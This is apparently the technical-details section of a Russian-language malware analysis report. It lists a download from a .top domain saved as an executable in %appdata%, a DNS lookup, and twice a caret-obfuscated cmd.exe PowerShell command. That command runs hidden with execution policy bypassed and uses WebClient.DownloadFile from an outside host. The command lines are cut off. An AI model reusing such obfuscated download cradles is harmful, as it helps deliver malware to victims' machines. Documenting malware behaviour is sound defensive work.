Техническая информация
- http://truepokemonant.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "power^S^H^E^Ll.e^x^E^ -eX^E^CU^tio^Np^O^lI^c^Y Byp^ass^ -^NOPr^OFIL^E^ ^-W^INDo^wST^YLe HidDe^n^ ^(N^eW-^O^Bj^eC^t sy^sTem.NeT^.w^EBCl^i^E^N^T)^.DO^w^NLOadFile('http://true...
- DNS ASK tr####kemonant.top
- '<SYSTEM32>\cmd.exe' /c "power^S^H^E^Ll.e^x^E^ -eX^E^CU^tio^Np^O^lI^c^Y Byp^ass^ -^NOPr^OFIL^E^ ^-W^INDo^wST^YLe HidDe^n^ ^(N^eW-^O^Bj^eC^t sy^sTem.NeT^.w^EBCl^i^E^N^T)^.DO^w^NLOadFile('http://true...' (со скрытым окном)